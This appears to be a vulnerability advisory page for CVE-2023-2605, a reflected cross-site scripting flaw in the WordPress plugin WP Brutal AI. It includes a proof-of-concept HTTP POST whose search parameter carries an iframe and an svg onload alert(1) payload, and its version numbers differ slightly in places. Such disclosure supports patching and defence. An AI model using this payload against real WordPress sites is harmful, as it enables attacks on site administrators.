WordPress WP Brutal AI Cross Site Scripting

🗓️ 25 Jul 2023 00:00:00Reported by Taurus OmarType

packetstorm🔗 packetstormsecurity.com👁 447 Views

WordPress WP Brutal AI plugin <2.0.1 - Admin + Reflected XSS, CVE-2023-260

Reporter	Title	Published	Views	Family All 11
CNNVD	WordPress plugin WP Brutal AI 跨站脚本漏洞	27 Jun 202300:00	–	cnnvd
CVE	CVE-2023-2605	27 Jun 202313:17	–	cve
Cvelist	CVE-2023-2605 WP Brutal AI < 2.0.1 - Admin+ Reflected XSS	27 Jun 202313:17	–	cvelist
EUVD	EUVD-2023-34079	3 Oct 202520:07	–	euvd
NVD	CVE-2023-2605	27 Jun 202314:15	–	nvd
Patchstack	WordPress WP Brutal AI Plugin < 2.0.1 is vulnerable to Cross Site Scripting (XSS)	5 Jun 202300:00	–	patchstack
Prion	Cross site scripting	27 Jun 202314:15	–	prion
Positive Technologies	PT-2023-20450 · WordPress · Wpbrutalai	27 Jun 202300:00	–	ptsecurity
RedhatCVE	CVE-2023-2605	23 May 202503:27	–	redhatcve
Vulnrichment	CVE-2023-2605 WP Brutal AI < 2.0.1 - Admin+ Reflected XSS	27 Jun 202313:17	–	vulnrichment

`Tittle:  
WordPress Plugin WP Brutal AI < 2.0.1 - Admin + Reflected XSS  
  
  
References:  
CVE-2023-2605  
  
Author:  
Taurus Omar   
  
Description:  
The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against a logged in high privilege users such as admin.  
  
Affects Plugins:  
WP Brutal AI- Fixed in version 2.0.0  
  
Proof of Concept:  
  
Send an HTTP request with the following:  
  
```  
POST https://example.com/wp-admin/admin.php?page=viewwpbrutalaicampaign&id=1 HTTP/1.1  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 86  
Cookie: [Admin+]  
  
search=%22%3E%27%3E%3Ciframe+src%3D%22%3Csvg+onload%3Dalert%281%29%3B%3E%22%3E&status=  
  
```  
  
Classification:  
Type XSS   
OWASP top 10 A7: Cross-Site Scripting (XSS)  
CWE-79  
  
wpScan:  
https://wpscan.com/vulnerability/372cb940-71ba-4d19-b35a-ab15f8c2fdeb  
`

25 Jul 2023 00:00Current

7.1High risk

Vulners AI Score7.1

CVSS 3.16.1

EPSS0.00162

SSVC